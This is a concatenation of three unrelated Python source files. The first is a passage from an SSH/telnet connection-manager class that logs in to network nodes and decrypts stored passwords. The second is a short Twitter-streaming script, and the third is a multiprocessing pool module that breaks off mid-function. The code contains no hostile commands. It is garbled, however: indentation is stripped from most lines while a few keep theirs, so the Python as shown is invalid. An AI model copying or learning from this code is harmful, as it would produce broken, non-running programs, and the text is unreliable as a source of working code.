- port (str): Port to connect to the node, default 22 for ssh and 23
for telnet.
- protocol (str): Select ssh or telnet. Default is ssh.
- user (str): Username for the node.
- config (obj): Object created with the configfile class, providing the
key for decryption and extra configuration when using
the connection manager.
'''
if config == '':
self.idletime = 0
self.key = None
else:
self.idletime = config.config["idletime"]
self.key = config.key
self.unique = unique
attr = {"host": host, "logs": logs, "options":options, "port": port, "protocol": protocol, "user": user}
for key in attr:
profile = re.search("^@(.*)", attr[key])
if profile and config != '':
setattr(self,key,config.profiles[profile.group(1)][key])
elif attr[key] == '' and key == "protocol":
try:
setattr(self,key,config.profiles["default"][key])
except:
setattr(self,key,"ssh")
else:
setattr(self,key,attr[key])
        if isinstance(password, list):
            self.password = []
            for passwd in password:
                profile = re.search("^@(.*)", passwd)
                if profile and config != '':
                    self.password.append(config.profiles[profile.group(1)]["password"])
                else:
                    # keep plaintext/encrypted entries that are not profile references
                    self.password.append(passwd)
        else:
            self.password = [password]
def __passtx(self, passwords, *, keyfile=None):
        # decrypts passwords, used by other methods.
dpass = []
if keyfile is None:
keyfile = self.key
if keyfile is not None:
key = RSA.import_key(open(keyfile).read())
decryptor = PKCS1_OAEP.new(key)
for passwd in passwords:
if not re.match('^b[\"\'].+[\"\']$', passwd):
dpass.append(passwd)
else:
try:
decrypted = decryptor.decrypt(ast.literal_eval(passwd)).decode("utf-8")
dpass.append(decrypted)
except:
raise ValueError("Missing or corrupted key")
return dpass
def _logfile(self, logfile = None):
# translate logs variables and generate logs path.
if logfile == None:
logfile = self.logs
logfile = logfile.replace("${unique}", self.unique)
logfile = logfile.replace("${host}", self.host)
logfile = logfile.replace("${port}", self.port)
logfile = logfile.replace("${user}", self.user)
logfile = logfile.replace("${protocol}", self.protocol)
now = datetime.datetime.now()
dateconf = re.search(r'\$\{date \'(.*)\'}', logfile)
if dateconf:
logfile = re.sub(r'\$\{date (.*)}',now.strftime(dateconf.group(1)), logfile)
return logfile
def _logclean(self, logfile, var = False):
#Remove special ascii characters and other stuff from logfile.
if var == False:
t = open(logfile, "r").read()
else:
t = logfile
t = t.replace("\n","",1)
t = t.replace("\a","")
t = t.replace('\n\n', '\n')
t = re.sub(r'.\[K', '', t)
while True:
tb = re.sub('.\b', '', t, count=1)
if len(t) == len(tb):
break
t = tb
        ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
t = ansi_escape.sub('', t)
t = t.lstrip(" \n\r")
t = t.replace("\r","")
if var == False:
d = open(logfile, "w")
d.write(t)
d.close()
return
else:
return t
def interact(self, debug = False):
'''
Allow user to interact with the node directly, mostly used by connection manager.
### Optional Parameters:
        - debug (bool): If True, display all the connection information
                        before interacting. Default False.
'''
connect = self._connect(debug = debug)
if connect == True:
size = re.search('columns=([0-9]+).*lines=([0-9]+)',str(os.get_terminal_size()))
self.child.setwinsize(int(size.group(2)),int(size.group(1)))
print("Connected to " + self.unique + " at " + self.host + (":" if self.port != '' else '') + self.port + " via: " + self.protocol)
if 'logfile' in dir(self):
self.child.logfile_read = open(self.logfile, "wb")
elif debug:
self.child.logfile_read = None
if 'missingtext' in dir(self):
print(self.child.after.decode(), end='')
self.child.interact()
if "logfile" in dir(self) and not debug:
self._logclean(self.logfile)
else:
print(connect)
exit(1)
def run(self, commands, vars = None,*, folder = '', prompt = r'>$|#$|\$$|>.$|#.$|\$.$', stdout = False, timeout = 10):
'''
Run a command or list of commands on the node and return the output.
### Parameters:
- commands (str/list): Commands to run on the node. Should be
str or a list of str. You can use variables
                               as {varname} and define them in the optional
                               parameter vars.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables
used in commands parameter.
Keys: Variable names.
Values: strings.
### Optional Named Parameters:
- folder (str): Path where output log should be stored, leave
empty to disable logging.
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while
routers use ">" or "#". The default value should
work for most nodes. Change it if your connection
                        needs a special symbol.
- stdout (bool):Set True to send the command output to stdout.
default False.
- timeout (int):Time in seconds for expect to wait for prompt/EOF.
default 10.
### Returns:
str: Output of the commands you ran on the node.
'''
connect = self._connect(timeout = timeout)
now = datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')
if connect == True:
expects = [prompt, pexpect.EOF, pexpect.TIMEOUT]
output = ''
status = ''
if not isinstance(commands, list):
commands = [commands]
for c in commands:
if vars is not None:
c = c.format(**vars)
result = self.child.expect(expects, timeout = timeout)
self.child.sendline(c)
if result == 0:
output = output + self.child.before.decode() + self.child.after.decode()
if result == 1:
output = output + self.child.before.decode()
if result == 2:
output = output + self.child.before.decode()
status = 2
break
if not status == 2:
result = self.child.expect(expects, timeout = timeout)
if result == 0:
output = output + self.child.before.decode() + self.child.after.decode()
if result == 1:
output = output + self.child.before.decode()
if result == 2:
output = output + self.child.before.decode()
status = 2
self.child.close()
output = self._logclean(output, True)
if stdout == True:
print(output)
if folder != '':
with open(folder + "/" + self.unique + "_" + now + ".txt", "w") as f:
                    f.write(output)  # the with-block closes the file automatically
self.output = output
if status == 2:
self.status = 2
else:
self.status = 0
return output
else:
self.output = connect
self.status = 1
if stdout == True:
print(connect)
if folder != '':
with open(folder + "/" + self.unique + "_" + now + ".txt", "w") as f:
                    f.write(connect)  # the with-block closes the file automatically
return connect
def test(self, commands, expected, vars = None,*, prompt = r'>$|#$|\$$|>.$|#.$|\$.$', timeout = 10):
'''
Run a command or list of commands on the node, then check if expected value appears on the output after the last command.
### Parameters:
- commands (str/list): Commands to run on the node. Should be
str or a list of str. You can use variables
                               as {varname} and define them in the optional
parameter vars.
- expected (str) : Expected text to appear after running
                           all the commands on the node. You can use
                           variables as {varname} and define them
                           in the optional parameter vars.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables
used in commands and expected parameters.
Keys: Variable names.
Values: strings.
### Optional Named Parameters:
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while
routers use ">" or "#". The default value should
work for most nodes. Change it if your connection
                        needs a special symbol.
- timeout (int):Time in seconds for expect to wait for prompt/EOF.
default 10.
### Returns:
        bool: True if the expected value is found after running the commands,
              False if the prompt is found first.
'''
connect = self._connect(timeout = timeout)
if connect == True:
expects = [prompt, pexpect.EOF, pexpect.TIMEOUT]
output = ''
if not isinstance(commands, list):
commands = [commands]
for c in commands:
if vars is not None:
c = c.format(**vars)
result = self.child.expect(expects, timeout = timeout)
self.child.sendline(c)
if result == 0:
output = output + self.child.before.decode() + self.child.after.decode()
if result == 1:
output = output + self.child.before.decode()
if result == 2:
                    output = output + self.child.before.decode()
                    self.result = None
                    self.output = self._logclean(output, True)
                    self.status = 2
                    self.child.close()
                    return self.output
if vars is not None:
expected = expected.format(**vars)
expects = [expected, prompt, pexpect.EOF, pexpect.TIMEOUT]
results = self.child.expect(expects, timeout = timeout)
self.child.close()
if results == 0:
self.result = True
output = output + self.child.before.decode() + self.child.after.decode()
output = self._logclean(output, True)
self.output = output
self.status = 0
return True
if results in [1, 2]:
self.result = False
if results == 1:
output = output + self.child.before.decode() + self.child.after.decode()
elif results == 2:
output = output + self.child.before.decode()
output = self._logclean(output, True)
self.output = output
self.status = 0
return False
if results == 3:
self.result = None
output = output + self.child.before.decode()
output = self._logclean(output, True)
self.output = output
self.status = 2
return output
else:
self.result = None
self.output = connect
self.status = 1
return connect
def _connect(self, debug = False, timeout = 20):
# Method to connect to the node, it parse all the information, create the ssh/telnet command and login to the node.
if self.protocol == "ssh":
cmd = "ssh"
if self.idletime > 0:
cmd = cmd + " -o ServerAliveInterval=" + str(self.idletime)
if self.user == '':
cmd = cmd + " {}".format(self.host)
else:
cmd = cmd + " {}".format("@".join([self.user,self.host]))
if self.port != '':
cmd = cmd + " -p " + self.port
if self.options != '':
cmd = cmd + " " + self.options
if self.logs != '':
self.logfile = self._logfile()
if self.password[0] != '':
passwords = self.__passtx(self.password)
else:
passwords = []
expects = ['yes/no', 'refused', 'supported', 'cipher', 'sage', 'timeout', 'unavailable', 'closed', '[p|P]assword:|[u|U]sername:', r'>$|#$|\$$|>.$|#.$|\$.$', 'suspend', pexpect.EOF, pexpect.TIMEOUT, "No route to host", "resolve hostname", "no matching host key"]
elif self.protocol == "telnet":
cmd = "telnet " + self.host
if self.port != '':
cmd = cmd + " " + self.port
if self.options != '':
cmd = cmd + " " + self.options
if self.logs != '':
self.logfile = self._logfile()
if self.password[0] != '':
passwords = self.__passtx(self.password)
else:
passwords = []
expects = ['[u|U]sername:', 'refused', 'supported', 'cipher', 'sage', 'timeout', 'unavailable', 'closed', '[p|P]assword:', r'>$|#$|\$$|>.$|#.$|\$.$', 'suspend', pexpect.EOF, pexpect.TIMEOUT, "No route to host", "resolve hostname", "no matching host key"]
else:
raise ValueError("Invalid protocol: " + self.protocol)
child = pexpect.spawn(cmd)
if debug:
print(cmd)
child.logfile_read = sys.stdout.buffer
if len(passwords) > 0:
loops = len(passwords)
else:
loops = 1
endloop = False
for i in range(0, loops):
while True:
results = child.expect(expects, timeout=timeout)
if results == 0:
if self.protocol == "ssh":
child.sendline('yes')
elif self.protocol == "telnet":
if self.user != '':
child.sendline(self.user)
else:
self.missingtext = True
break
if results in [1, 2, 3, 4, 5, 6, 7, 12, 13, 14, 15]:
child.close()
return "Connection failed code:" + str(results)
if results == 8:
if len(passwords) > 0:
child.sendline(passwords[i])
else:
self.missingtext = True
break
if results in [9, 11]:
endloop = True
child.sendline()
break
if results == 10:
child.sendline("\r")
sleep(2)
if endloop:
break
child.readline(0)
self.child = child
return True
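# Usage sketch: a minimal, hypothetical example of the node API documented above.
# The hostname, credentials and commands are placeholders; passwords may be given
# in plaintext or as the repr() of the PKCS1_OAEP ciphertext (a "b'...'" string).
def _example_node_usage():
    router = node("router1", "192.168.1.1", user="admin", password="plaintext-pass")
    version = router.run(["show version"], stdout=True)                 # full output (str)
    ok = router.test("show version", "Version {v}", vars={"v": "1.0"})  # True/False
    return version, ok, router.status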
class nodes:
''' This class generates a nodes object. Contains a list of node class objects and methods to run multiple tasks on nodes simultaneously.
### Attributes:
- nodelist (list): List of node class objects passed to the init
function.
- output (dict): Dictionary formed by nodes unique as keys,
output of the commands you ran on the node as
value. Created after running methods run or test.
- result (dict): Dictionary formed by nodes unique as keys, value
is True if expected value is found after running
the commands, False if prompt is found before.
Created after running method test.
- status (dict): Dictionary formed by nodes unique as keys, value:
                     0 if method run or test ended successfully.
1 if connection failed.
2 if expect timeouts without prompt or EOF.
- <unique> (obj): For each item in nodelist, there is an attribute
generated with the node unique.
'''
def __init__(self, nodes: dict, config = ''):
'''
### Parameters:
- nodes (dict): Dictionary formed by node information:
Keys: Unique name for each node.
Mandatory Subkeys: host(str).
Optional Subkeys: options(str), logs(str), password(str),
port(str), protocol(str), user(str).
For reference on subkeys check node class.
### Optional Parameters:
- config (obj): Pass the object created with class configfile with key
for decryption and extra configuration if you are using
connection manager.
'''
self.nodelist = []
self.config = config
for n in nodes:
this = node(n, **nodes[n], config = config)
self.nodelist.append(this)
setattr(self,n,this)
def _splitlist(self, lst, n):
#split a list in lists of n members.
for i in range(0, len(lst), n):
yield lst[i:i + n]
def run(self, commands, vars = None,*, folder = None, prompt = None, stdout = None, parallel = 10, timeout = None):
'''
Run a command or list of commands on all the nodes in nodelist.
### Parameters:
- commands (str/list): Commands to run on the nodes. Should be str or
list of str. You can use variables as {varname}
                           and define them in the optional parameter vars.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables for
each node, used in commands parameter.
Keys should be formed by nodes unique names. Use
special key name __global__ for global variables.
Subkeys: Variable names.
Values: strings.
### Optional Named Parameters:
- folder (str): Path where output log should be stored, leave empty
to disable logging.
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while routers
use ">" or "#". The default value should work for
                        most nodes. Change it if your connection needs a
                        special symbol.
- stdout (bool): Set True to send the command output to stdout.
Default False.
- parallel (int): Number of nodes to run the commands simultaneously.
                          Default is 10; if there are more nodes than this
                          value, they are split into groups of at most this
                          many members.
- timeout (int): Time in seconds for expect to wait for prompt/EOF.
                         default 10.
        ### Returns:
        dict: Dictionary formed by nodes unique as keys, output of the
              commands you ran on the node as value.
'''
args = {}
nodesargs = {}
args["commands"] = commands
if folder != None:
args["folder"] = folder
Path(folder).mkdir(parents=True, exist_ok=True)
if prompt != None:
args["prompt"] = prompt
if stdout != None:
args["stdout"] = stdout
if timeout != None:
args["timeout"] = timeout
output = {}
status = {}
tasks = []
for n in self.nodelist:
nodesargs[n.unique] = deepcopy(args)
if vars != None:
nodesargs[n.unique]["vars"] = {}
if "__global__" in vars.keys():
nodesargs[n.unique]["vars"].update(vars["__global__"])
if n.unique in vars.keys():
nodesargs[n.unique]["vars"].update(vars[n.unique])
tasks.append(threading.Thread(target=n.run, kwargs=nodesargs[n.unique]))
taskslist = list(self._splitlist(tasks, parallel))
for t in taskslist:
for i in t:
i.start()
for i in t:
i.join()
for i in self.nodelist:
output[i.unique] = i.output
status[i.unique] = i.status
self.output = output
self.status = status
return output
def test(self, commands, expected, vars = None,*, prompt = None, parallel = 10, timeout = None):
'''
Run a command or list of commands on all the nodes in nodelist, then check if expected value appears on the output after the last command.
### Parameters:
- commands (str/list): Commands to run on the node. Should be str or
list of str.
- expected (str) : Expected text to appear after running all the
commands on the node.
### Optional Parameters:
- vars (dict): Dictionary containing the definition of variables for
each node, used in commands and expected parameters.
Keys should be formed by nodes unique names. Use
special key name __global__ for global variables.
Subkeys: Variable names.
Values: strings.
### Optional Named Parameters:
- prompt (str): Prompt to be expected after a command is finished
running. Usually linux uses ">" or EOF while
routers use ">" or "#". The default value should
work for most nodes. Change it if your connection
                        needs a special symbol.
- parallel (int): Number of nodes to run the commands simultaneously.
                          Default is 10; if there are more nodes than this
                          value, they are split into groups of at most this
                          many members.
- timeout (int): Time in seconds for expect to wait for prompt/EOF.
                         default 10.
### Returns:
dict: Dictionary formed by nodes unique as keys, value is True if
expected value is found after running the commands, False
if prompt is found before.
'''
args = {}
nodesargs = {}
args["commands"] = commands
args["expected"] = expected
if prompt != None:
args["prompt"] = prompt
if timeout != None:
args["timeout"] = timeout
output = {}
result = {}
status = {}
tasks = []
for n in self.nodelist:
nodesargs[n.unique] = deepcopy(args)
if vars != None:
nodesargs[n.unique]["vars"] = {}
if "__global__" in vars.keys():
nodesargs[n.unique]["vars"].update(vars["__global__"])
if n.unique in vars.keys():
nodesargs[n.unique]["vars"].update(vars[n.unique])
tasks.append(threading.Thread(target=n.test, kwargs=nodesargs[n.unique]))
taskslist = list(self._splitlist(tasks, parallel))
for t in taskslist:
for i in t:
i.start()
for i in t:
i.join()
for i in self.nodelist:
result[i.unique] = i.result
output[i.unique] = i.output
status[i.unique] = i.status
self.output = output
self.result = result
self.status = status
return result
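# Usage sketch: a hypothetical parallel run over a small inventory, as documented
# in nodes.run(). Hosts, credentials and the {version} variable are placeholders;
# per-node values are applied on top of the special __global__ key.
def _example_nodes_usage():
    inventory = {"router1": {"host": "192.168.1.1", "user": "admin", "password": "pass1"},
                 "router2": {"host": "192.168.1.2", "user": "admin", "password": "pass2"}}
    group = nodes(inventory)
    cmd_vars = {"__global__": {"version": "version"}, "router2": {"version": "version brief"}}
    output = group.run(["show {version}"], vars=cmd_vars, parallel=2)
    return output, group.status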
# script
|
main.py
|
from streamlistener import StreamListener
import tweepy
from settings import Settings
from send import EventHubSender
import webapp
import threading
httpd = webapp.HTTPServer(('0.0.0.0', Settings.WEB_PORT), webapp.web_server)
thread = threading.Thread(target=httpd.serve_forever)
thread.daemon = True
thread.start()
print("HTTPServer started on port {0}".format(Settings.WEB_PORT))
auth = tweepy.OAuthHandler(Settings.TWITTER_APP_KEY, Settings.TWITTER_APP_SECRET)
auth.set_access_token(Settings.TWITTER_KEY, Settings.TWITTER_SECRET)
api = tweepy.API(auth)
stream_listener = StreamListener(output=EventHubSender(Settings.EVENTHUBS_CONNECTIONSTRING))
stream = tweepy.Stream(auth=api.auth, listener=stream_listener)
stream.filter(track=Settings.TRACK_TERMS)
httpd.shutdown()
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import pickle_loads, reset_signals, restart_state
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
    # handled by any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
else:
from os import kill as _kill # noqa
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
SIGMAP = dict(
(getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG')
)
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def human_status(status):
if (status or 0) < 0:
try:
return 'signal {0} ({1})'.format(-status, SIGMAP[-status])
except KeyError:
return 'signal {0}'.format(-status)
return 'exitcode {0}'.format(status)
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def __init__(self, value=1, verbose=None):
if PY3:
_Semaphore.__init__(self, value)
else:
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
    def grow(self):
        if PY3:
            cond = self._cond
        else:
            cond = self._Semaphore__cond
        with cond:
            self._initial_value += 1
            # the name of the internal counter differs between Python 2 and 3
            if PY3:
                self._value += 1
            else:
                self._Semaphore__value += 1
            cond.notify()
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
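# Behaviour sketch (illustrative only): the "lax" semantics described in the
# docstring above mean that release() calls beyond the initial value are
# silently ignored instead of raising, so the counter never exceeds the bound.
def _example_lax_semaphore():
    sem = LaxBoundedSemaphore(2)
    sem.acquire()    # counter drops to 1
    sem.release()    # counter restored to 2
    sem.release()    # ignored: counter already equals the initial value
    return sem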
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
_controlled_termination = False
_job_terminated = False
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), signal.SIGTERM)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
            # Keep maintaining workers until the cache gets drained, unless
            # the pool is terminated.
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
super(TaskHandler, self).__init__()
def body(self):
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
try:
i = -1
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception as exc:
error('Task Handler ERROR: %r', exc, exc_info=1)
break
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, signal.SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
